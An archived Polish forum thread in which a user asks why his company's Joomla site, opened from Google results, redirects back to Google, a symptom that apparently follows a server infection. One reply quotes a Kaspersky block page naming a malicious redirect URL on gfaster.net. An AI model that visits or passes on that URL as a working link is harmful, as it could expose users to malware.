PDA

Zobacz pełną wersję : Problem z Jommla i Google



amcora2
27-01-2011, 14:03
Witam wszystkich jestem nowym uzytkownikiem tego forum wiec prosze o wyrozumialosc
Mam problem. Pracuje w firmie ktora ma swoja strone www postawionaq wlasnie ja jomli i od jakiegos czasu pojawil sie problem z googlami a mianowicie strona jest dodana do wyszukiwarki w googla i po wpisaniu w googlas np. seger ( bo w tej firmie pracuje www.seger.com.pl (http://www.seger.com.pl)) wyswietla sie linka do strony ale po kliknieciu w niego nie da sie wejsc na strone tj przechodzi spowrotem do googla. Zrobilo sie to niedawno. Wczesniej mielismy taki problem ze po wpisaniu sege w google i kliknieciu w link na liscie wynikow otwierala sie pusta strona ale jak sie kliknelo F5 to dopiero wtedy uruchamialas sie strona seger. Pozniej ponoc mielismy jakiegos wirusa na serwerze i home nam usunol tego wirka i od tego czasu jest taka sytuacja. Mecze sie z tym od jakiegos czasu a jestem zielony w jomli czy ma moze ktos jakies pomysly czemu tak sie dzieje i jak to naprawic ?

Bardzo prosze o pomoc.
Z gory dizekuje

palyga007
27-01-2011, 14:10
u mnie działa normalnie

tj. wpisuje w google seger com pl
mam na pierwszym miejscu waszą witrynę klikam i wchodzę na stronę.
Nie dostrzegam problemu.


Hmmm. to pewnie u mnie działa dlatego że nie mam Windozy :)

amcora2
27-01-2011, 14:14
Czy mogłby ktos jeszcze to potwierdzic ? Bo u mnie i na fire fox i w IE sa takie same objawy. Co ciekawsze jak wpisze adres strony w IE badz w lisa to strona sie otwiera normalnie. Tylko wchodzac przez google mam taki blad. W pracy mam NOD ESet wiec raczej wira nie mam.

Garlic
28-01-2011, 23:44
Rzeczywiście, jeśli szuka się w googlach to wraca do googli, jak się wpisze adres to jest OK, dziwne ;).

Gall Anonim
29-01-2011, 00:10
No to u mnie kasper wyrzuca coś takiego


Kaspersky

Anti-Virus 2011


Dostęp zabroniony

Żądany adres nie może zostać pobrany

URL:

http://gfaster.net/se/21a49eeb8fd40def38